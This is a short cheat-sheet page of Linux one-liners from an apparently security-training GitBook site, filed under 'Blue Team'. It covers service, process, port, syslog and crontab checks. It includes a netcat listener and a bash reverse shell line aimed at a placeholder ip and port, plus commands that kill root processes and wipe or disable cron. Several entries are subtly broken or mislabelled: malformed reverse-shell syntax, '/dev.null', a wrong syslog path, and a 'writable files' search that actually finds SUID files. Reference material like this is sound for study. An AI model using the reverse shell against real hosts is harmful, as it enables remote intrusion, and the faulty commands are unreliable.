Pentest Tips
  • ABOUT
  • Information Shares
  • CTF
    • Stego
    • Memory
  • Blue Team
    • Tools/Resources
    • One Liners
    • Threat Hunting
    • Scripts
    • Intrusion
  • Web
    • Resources
    • General Web
    • Subdomain Discovery
    • Content Discovery
    • MYSQL
    • Burpsuite
  • Network Exploitation
    • Resources
    • Kerberos
    • Network Based
    • Phishing
    • Metasploit
    • Weaponization
    • Password Cracking
    • Shell Upgrades
    • Linux PrivEsc
    • Windows PrivEsc
    • Windows Persistence
    • Exfiltration
  • Windows Internals
    • Kernal
  • Recon
    • Nmap
    • OSINT
    • SMB Enumeration
    • LDAP
    • Physical
  • Malware
    • Obfuscation
  • Scripting
    • Bash Basics
    • Powershell Basics
  • Cloud
    • AWS
  • Game Hacking
    • Resources
Powered by GitBook
On this page
  • List All Running Services:
  • Enable Ping
  • Netcat Listener
  • Bash Reverse Shell
  • View Running Processes
  • Find Writable files
  • Python Web Server
  • Kill all processes newer then 5m
  • Active TCP Connections
  • Check Syslog
  • Crontab
  • Investigate Running Port
Edit on GitHub
  1. Blue Team

One Liners

List All Running Services:

systemctl list-units --type=service --state=running

Enable Ping

echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all

Netcat Listener

nc -nlvp <port>

Bash Reverse Shell

bash -i > &/dev/tcp/ip/port/ 0>&1

View Running Processes

ps -aux

Find Writable files

find / -perm -u=s -type f 2>/dev.null

Python Web Server

python3 -m http.server <port>

Kill all processes newer then 5m

sudo killall -u root -y 5m

Active TCP Connections

ss -tulpn

Check Syslog

cat /var/logs/syslog | grep <something>

Crontab

# View crontab with
crontab -l
# Reset crontab with
crontab -r
# Disable with
systemctl stop crond.service
systemctl disable crond.service

Investigate Running Port

sudo lsof -i :<port>
PreviousTools/ResourcesNextThreat Hunting

Last updated 2 years ago